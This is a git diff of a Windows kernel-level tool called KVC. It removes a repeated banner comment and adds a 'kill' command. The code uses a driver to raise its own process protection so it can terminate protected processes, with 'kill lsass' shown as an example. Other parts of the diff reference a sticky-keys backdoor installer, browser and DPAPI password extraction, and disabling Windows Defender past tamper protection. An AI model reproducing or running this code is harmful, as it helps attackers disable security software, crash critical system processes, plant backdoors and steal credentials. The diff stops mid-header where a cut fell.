diff --git a/kvc/BrowserOrchestrator.cpp b/kvc/BrowserOrchestrator.cpp index 357e2ac..00a9c82 100644 --- a/kvc/BrowserOrchestrator.cpp +++ b/kvc/BrowserOrchestrator.cpp @@ -1,29 +1,4 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - -// BrowserOrchestrator.cpp +// BrowserOrchestrator.cpp #include #include #include diff --git a/kvc/Controller.h b/kvc/Controller.h index 658cb42..8c62ae1 100644 --- a/kvc/Controller.h +++ b/kvc/Controller.h @@ -10,10 +10,10 @@ class ReportExporter; -// Core kernel process structures +// Core kernel process structures for EPROCESS manipulation struct ProcessEntry { - ULONG_PTR KernelAddress; // EPROCESS structure address + ULONG_PTR KernelAddress; // EPROCESS structure address in kernel space DWORD Pid; // Process identifier UCHAR ProtectionLevel; // PP/PPL/None protection level UCHAR SignerType; // Digital signature authority @@ -43,7 +43,7 @@ struct SQLiteAPI int (*close_v2)(void*) = nullptr; }; -// Password extraction result structure +// Password extraction result structure for DPAPI operations struct PasswordResult { std::wstring type; // Chrome, Edge, WiFi credential type @@ -104,6 +104,19 @@ public: bool UnprotectAllProcesses() noexcept; bool UnprotectMultipleProcesses(const std::vector& targets) noexcept; + // Process termination with driver support + bool KillProcess(DWORD pid) noexcept; + bool KillProcessByName(const std::wstring& processName) noexcept; + + // Kernel process access for external operations (ProcessManager) + std::optional GetProcessKernelAddress(DWORD pid) noexcept; + std::optional GetProcessProtection(ULONG_PTR kernelAddress) noexcept; + std::vector GetProcessList() noexcept; + + // Self-protection operations for privilege escalation + bool SelfProtect(const std::wstring& protectionLevel, const std::wstring& signerType) noexcept; + std::optional ResolveNameWithoutDriver(const std::wstring& processName) noexcept; + // DPAPI password extraction with TrustedInstaller bool ShowPasswords(const std::wstring& outputPath) noexcept; bool ExportBrowserData(const std::wstring& outputPath, const std::wstring& browserType) noexcept; @@ -142,10 +155,6 @@ public: bool StartDriverServiceSilent() noexcept; std::vector ExtractEncryptedDriver() noexcept; std::vector DecryptDriver(const std::vector& encryptedData) noexcept; - - // Self-protection operations - bool SelfProtect(const std::wstring& protectionLevel, const std::wstring& signerType) noexcept; - std::optional ResolveNameWithoutDriver(const std::wstring& processName) noexcept; // Sticky keys backdoor management bool InstallStickyKeysBackdoor() noexcept; @@ -162,7 +171,7 @@ private: bool EnablePrivilege(LPCWSTR privilegeName) noexcept; bool EnableDebugPrivilege() noexcept; - // Enhanced file writing with TrustedInstaller privileges + // Enhanced file writing with TrustedInstaller privileges bool WriteFileWithPrivileges(const std::wstring& filePath, const std::vector& data) noexcept; // PE splitting with enhanced validation @@ -172,7 +181,7 @@ private: // Atomic driver operations for stability bool ForceRemoveService() noexcept; - bool EnsureDriverAvailable() noexcept; + bool EnsureDriverAvailable() noexcept; bool IsDriverCurrentlyLoaded() noexcept; bool PerformAtomicInit() noexcept; bool PerformAtomicInitWithErrorCleanup() noexcept; @@ -181,11 +190,8 @@ private: bool InstallDriverSilently() noexcept; bool RegisterDriverServiceSilent(const std::wstring& driverPath) noexcept; - // Kernel process management + // Internal kernel process management (implementation details) std::optional GetInitialSystemProcessAddress() noexcept; - std::optional GetProcessKernelAddress(DWORD pid) noexcept; - std::vector GetProcessList() noexcept; - std::optional GetProcessProtection(ULONG_PTR addr) noexcept; bool SetProcessProtection(ULONG_PTR addr, UCHAR protection) noexcept; // Process pattern matching with regex support @@ -234,5 +240,4 @@ private: // Emergency cleanup for atomic operations bool PerformAtomicCleanup() noexcept; - }; \ No newline at end of file diff --git a/kvc/ControllerBinaryManager.cpp b/kvc/ControllerBinaryManager.cpp index f4eeec6..ae3673e 100644 --- a/kvc/ControllerBinaryManager.cpp +++ b/kvc/ControllerBinaryManager.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - // ControllerBinaryManager.cpp - Fixed compilation issues #include "Controller.h" #include "common.h" diff --git a/kvc/ControllerCore.cpp b/kvc/ControllerCore.cpp index c3a5a9e..4337e6e 100644 --- a/kvc/ControllerCore.cpp +++ b/kvc/ControllerCore.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - // ControllerCore.cpp #include "Controller.h" #include "common.h" diff --git a/kvc/ControllerDriverManager.cpp b/kvc/ControllerDriverManager.cpp index db837d3..eaa82fb 100644 --- a/kvc/ControllerDriverManager.cpp +++ b/kvc/ControllerDriverManager.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - // ControllerDriverManager.cpp #include "Controller.h" #include "common.h" diff --git a/kvc/ControllerDriverManager_.cpp b/kvc/ControllerDriverManager_.cpp index cdffc87..743bd58 100644 --- a/kvc/ControllerDriverManager_.cpp +++ b/kvc/ControllerDriverManager_.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - // ControllerDriverManager.cpp #include "Controller.h" #include "common.h" diff --git a/kvc/ControllerEventLogOperations.cpp b/kvc/ControllerEventLogOperations.cpp index 6e444c6..cce7e6e 100644 --- a/kvc/ControllerEventLogOperations.cpp +++ b/kvc/ControllerEventLogOperations.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - #include "Controller.h" #include "common.h" diff --git a/kvc/ControllerMemoryOperations.cpp b/kvc/ControllerMemoryOperations.cpp index 4d515a1..b1159e4 100644 --- a/kvc/ControllerMemoryOperations.cpp +++ b/kvc/ControllerMemoryOperations.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - // ControllerMemoryOperations.cpp #include "Controller.h" #include "common.h" diff --git a/kvc/ControllerPasswordManager.cpp b/kvc/ControllerPasswordManager.cpp index cd1a720..00ae8ca 100644 --- a/kvc/ControllerPasswordManager.cpp +++ b/kvc/ControllerPasswordManager.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - #include "Controller.h" #include "ReportExporter.h" #include "common.h" diff --git a/kvc/ControllerProcessOperations.cpp b/kvc/ControllerProcessOperations.cpp index 52b36e4..6504820 100644 --- a/kvc/ControllerProcessOperations.cpp +++ b/kvc/ControllerProcessOperations.cpp @@ -1,28 +1,4 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - +// ControllerProcessOperations.cpp #include "Controller.h" #include "common.h" #include "Utils.h" @@ -33,6 +9,179 @@ that define these protections. extern volatile bool g_interrupted; +// Process termination with protection elevation and fallback mechanisms +bool Controller::KillProcess(DWORD pid) noexcept +{ + // Try to get kernel address first - if driver already initialized, reuse it + auto kernelAddr = GetProcessKernelAddress(pid); + + bool needsCleanup = false; + + // Only initialize driver if not already loaded AND we couldn't get kernel address + if (!kernelAddr && !IsDriverCurrentlyLoaded()) { + if (!PerformAtomicInitWithErrorCleanup()) { + return false; + } + needsCleanup = true; + + // Try again after driver initialization + kernelAddr = GetProcessKernelAddress(pid); + } + + // If we still can't get kernel address, try direct termination without protection elevation + if (!kernelAddr) { + INFO(L"Could not get kernel address for target process, proceeding without self-protection"); + + HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pid); + if (!hProcess) { + DWORD error = GetLastError(); + ERROR(L"Failed to open process for termination (error: %d)", error); + if (needsCleanup) PerformAtomicCleanup(); + return false; + } + + BOOL terminated = TerminateProcess(hProcess, 1); + DWORD error = GetLastError(); + CloseHandle(hProcess); + + if (terminated) { + SUCCESS(L"Successfully terminated PID: %d (direct method)", pid); + if (needsCleanup) PerformAtomicCleanup(); + return true; + } else { + ERROR(L"Failed to terminate process directly (error: %d)", error); + if (needsCleanup) PerformAtomicCleanup(); + return false; + } + } + + // Get target process protection level for elevation + auto targetProtection = GetProcessProtection(kernelAddr.value()); + if (targetProtection && targetProtection.value() > 0) { + UCHAR targetLevel = Utils::GetProtectionLevel(targetProtection.value()); + UCHAR targetSigner = Utils::GetSignerType(targetProtection.value()); + + std::wstring levelStr = (targetLevel == static_cast(PS_PROTECTED_TYPE::Protected)) ? + L"PP" : L"PPL"; + + INFO(L"Target process has %s-%s protection, elevating current process", + levelStr.c_str(), + Utils::GetSignerTypeAsString(targetSigner)); + + // Elevate current process protection to match or exceed target + UCHAR currentProcessProtection = Utils::GetProtection(targetLevel, targetSigner); + if (!SetCurrentProcessProtection(currentProcessProtection)) { + ERROR(L"Failed to elevate current process protection"); + // Continue anyway - might still work + } + } + + // Attempt standard process termination + HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pid); + if (!hProcess) { + DWORD error = GetLastError(); + ERROR(L"Failed to open process for termination (error: %d)", error); + + // Try with more privileges if available + hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); + if (!hProcess) { + ERROR(L"Failed to open process with extended privileges (error: %d)", GetLastError()); + if (needsCleanup) PerformAtomicCleanup(); + return false; + } + } + + BOOL terminated = TerminateProcess(hProcess, 1); + DWORD terminationError = GetLastError(); + CloseHandle(hProcess); + + if (terminated) { + SUCCESS(L"Successfully terminated PID: %d", pid); + if (needsCleanup) PerformAtomicCleanup(); + return true; + } else { + ERROR(L"Failed to terminate PID: %d (error: %d)", pid, terminationError); + if (needsCleanup) PerformAtomicCleanup(); + return false; + } +} + +// Optimized batch process termination with shared driver state +bool Controller::KillProcessByName(const std::wstring& processName) noexcept +{ + if (!PerformAtomicInitWithErrorCleanup()) { + return false; + } + + auto matches = FindProcessesByName(processName); + + if (matches.empty()) { + ERROR(L"No process found matching pattern: %s", processName.c_str()); + PerformAtomicCleanup(); + return false; + } + + DWORD successCount = 0; + DWORD totalCount = static_cast(matches.size()); + + INFO(L"Found %d processes matching '%s'", totalCount, processName.c_str()); + + for (const auto& match : matches) { + INFO(L"Attempting to terminate process: %s (PID %d)", + match.ProcessName.c_str(), match.Pid); + + // Use direct kernel address since we already have it from FindProcessesByName + auto targetProtection = GetProcessProtection(match.KernelAddress); + if (targetProtection && targetProtection.value() > 0) { + UCHAR targetLevel = Utils::GetProtectionLevel(targetProtection.value()); + UCHAR targetSigner = Utils::GetSignerType(targetProtection.value()); + + std::wstring levelStr = (targetLevel == static_cast(PS_PROTECTED_TYPE::Protected)) ? + L"PP" : L"PPL"; + + INFO(L"Target process has %s-%s protection, elevating current process", + levelStr.c_str(), + Utils::GetSignerTypeAsString(targetSigner)); + + // Elevate current process protection to match or exceed target + UCHAR currentProcessProtection = Utils::GetProtection(targetLevel, targetSigner); + if (!SetCurrentProcessProtection(currentProcessProtection)) { + ERROR(L"Failed to elevate current process protection"); + // Continue anyway - might still work + } + } + + // Attempt termination with fallback approach + HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, match.Pid); + if (!hProcess) { + DWORD error = GetLastError(); + INFO(L"Failed to open with PROCESS_TERMINATE (error: %d), trying PROCESS_ALL_ACCESS", error); + + hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, match.Pid); + if (!hProcess) { + ERROR(L"Failed to open process with any privileges (error: %d)", GetLastError()); + continue; + } + } + + BOOL terminated = TerminateProcess(hProcess, 1); + DWORD terminationError = GetLastError(); + CloseHandle(hProcess); + + if (terminated) { + SUCCESS(L"Successfully terminated: %s (PID %d)", + match.ProcessName.c_str(), match.Pid); + successCount++; + } else { + ERROR(L"Failed to terminate PID: %d (error: %d)", match.Pid, terminationError); + } + } + + INFO(L"Kill operation completed: %d/%d processes terminated", successCount, totalCount); + PerformAtomicCleanup(); + return successCount > 0; +} + // Kernel process operations with interruption handling std::optional Controller::GetInitialSystemProcessAddress() noexcept { auto kernelBase = Utils::GetKernelBaseAddress(); @@ -52,7 +201,7 @@ std::optional Controller::GetProcessKernelAddress(DWORD pid) noexcept return entry.KernelAddress; } - ERROR(L"Failed to find kernel address for PID %d", pid); + INFO(L"Kernel address not available for PID %d, initializing driver...", pid); return std::nullopt; } @@ -443,7 +592,8 @@ bool Controller::ListProtectedProcesses() noexcept { } // Process protection manipulation with atomic operations -bool Controller::UnprotectProcess(DWORD pid) noexcept { +bool Controller::UnprotectProcess(DWORD pid) noexcept +{ if (!PerformAtomicInitWithErrorCleanup()) { return false; } diff --git a/kvc/ControllerSystemIntegration.cpp b/kvc/ControllerSystemIntegration.cpp index cab2b1a..5a9bc78 100644 --- a/kvc/ControllerSystemIntegration.cpp +++ b/kvc/ControllerSystemIntegration.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - // ControllerSystemIntegration.cpp #include "Controller.h" #include "common.h" diff --git a/kvc/DefenderManager.cpp b/kvc/DefenderManager.cpp index df8b8c5..e7eebd0 100644 --- a/kvc/DefenderManager.cpp +++ b/kvc/DefenderManager.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - #include "DefenderManager.h" #include #include diff --git a/kvc/HelpSystem.cpp b/kvc/HelpSystem.cpp index ef56b68..c8ca989 100644 --- a/kvc/HelpSystem.cpp +++ b/kvc/HelpSystem.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - #include #include "HelpSystem.h" #include @@ -36,6 +11,7 @@ void HelpSystem::PrintUsage(std::wstring_view programName) noexcept PrintServiceCommands(); PrintBasicCommands(); + PrintProcessTerminationCommands(); PrintProtectionCommands(); PrintSystemCommands(); PrintBrowserCommands(); @@ -118,6 +94,17 @@ void HelpSystem::PrintBasicCommands() noexcept std::wcout << L"\n"; } +void HelpSystem::PrintProcessTerminationCommands() noexcept +{ + PrintSectionHeader(L"Process Termination Commands"); + PrintCommandLine(L"kill ", L"Terminate process with automatic protection elevation"); + PrintCommandLine(L"kill ", L"Terminate multiple processes (comma-separated)"); + PrintNote(L"Supports process names: 'kill total' terminates Total Commander"); + PrintNote(L"Automatically matches target protection level for protected processes"); + PrintNote(L"Case-insensitive partial matching: 'notepad' matches 'notepad.exe'"); + std::wcout << L"\n"; +} + void HelpSystem::PrintProtectionCommands() noexcept { PrintSectionHeader(L"Process Protection Commands"); @@ -160,6 +147,7 @@ void HelpSystem::PrintSecurityEngineCommands() noexcept PrintCommandLine(L"secengine enable", L"Enable Windows Defender security engine"); PrintCommandLine(L"secengine status", L"Check current security engine status"); PrintCommandLine(L"secengine disable --restart", L"Disable and restart system immediately"); + PrintCommandLine(L"secengine enable --restart", L"Enable and restart system immediately"); PrintNote(L"Registry-level manipulation - bypasses tamper protection"); PrintNote(L"System restart required for changes to take effect"); std::wcout << L"\n"; @@ -311,6 +299,12 @@ void HelpSystem::PrintUsageExamples(std::wstring_view programName) noexcept printLine(L"set 5678 PP Windows", L"Force set PP-Windows protection"); printLine(L"unprotect lsass", L"Remove protection from LSASS"); printLine(L"unprotect 1,2,3,lsass", L"Batch unprotect multiple targets"); + + // Process termination examples + printLine(L"kill 1234", L"Terminate process with PID 1234"); + printLine(L"kill total", L"Terminate Total Commander by name"); + printLine(L"kill 1234,5678,9012", L"Terminate multiple processes"); + printLine(L"kill lsass", L"Terminate protected process (auto-elevation)"); // TrustedInstaller examples printLine(L"trusted cmd", L"Run command as TrustedInstaller"); @@ -331,6 +325,7 @@ void HelpSystem::PrintUsageExamples(std::wstring_view programName) noexcept printLine(L"secengine disable", L"Disable Windows Defender engine"); printLine(L"secengine enable", L"Re-enable Windows Defender engine"); printLine(L"secengine disable --restart", L"Disable Defender and restart system"); + printLine(L"secengine enable --restart", L"Enable Defender and restart system"); // Data extraction examples printLine(L"export secrets", L"Export secrets to Downloads folder"); diff --git a/kvc/HelpSystem.h b/kvc/HelpSystem.h index 9456bc7..a5fcbc2 100644 --- a/kvc/HelpSystem.h +++ b/kvc/HelpSystem.h @@ -18,6 +18,7 @@ public: static void PrintBasicCommands() noexcept; static void PrintProtectionCommands() noexcept; static void PrintSystemCommands() noexcept; + static void PrintProcessTerminationCommands() noexcept; static void PrintDefenderCommands() noexcept; static void PrintDPAPICommands() noexcept; static void PrintBrowserCommands() noexcept; diff --git a/kvc/KeyboardHook.cpp b/kvc/KeyboardHook.cpp index 9e5cc1d..ea0c4d3 100644 --- a/kvc/KeyboardHook.cpp +++ b/kvc/KeyboardHook.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - #include "KeyboardHook.h" #include "TrustedInstallerIntegrator.h" #include "common.h" diff --git a/kvc/Kvc.cpp b/kvc/Kvc.cpp index 8aa5037..a5300e2 100644 --- a/kvc/Kvc.cpp +++ b/kvc/Kvc.cpp @@ -1,31 +1,7 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - #include "common.h" #include "Controller.h" #include "DefenderManager.h" +#include "ProcessManager.h" #include "ServiceManager.h" #include "HelpSystem.h" #include @@ -393,6 +369,13 @@ int wmain(int argc, wchar_t* argv[]) return g_controller->DumpProcessByName(processName, outputPath) ? 0 : 2; } } + + // Process termination via kernel driver with batch support + else if (command == L"kill") + { + ProcessManager::HandleKillCommand(argc, argv, g_controller.get()); + return 0; + } // Process information commands with color-coded protection status output else if (command == L"list") diff --git a/kvc/Kvc.vcxproj b/kvc/Kvc.vcxproj index 6913bdb..7658796 100644 --- a/kvc/Kvc.vcxproj +++ b/kvc/Kvc.vcxproj @@ -113,6 +113,7 @@ + diff --git a/kvc/KvcDrv.cpp b/kvc/KvcDrv.cpp index 7be9443..23c724b 100644 --- a/kvc/KvcDrv.cpp +++ b/kvc/KvcDrv.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : 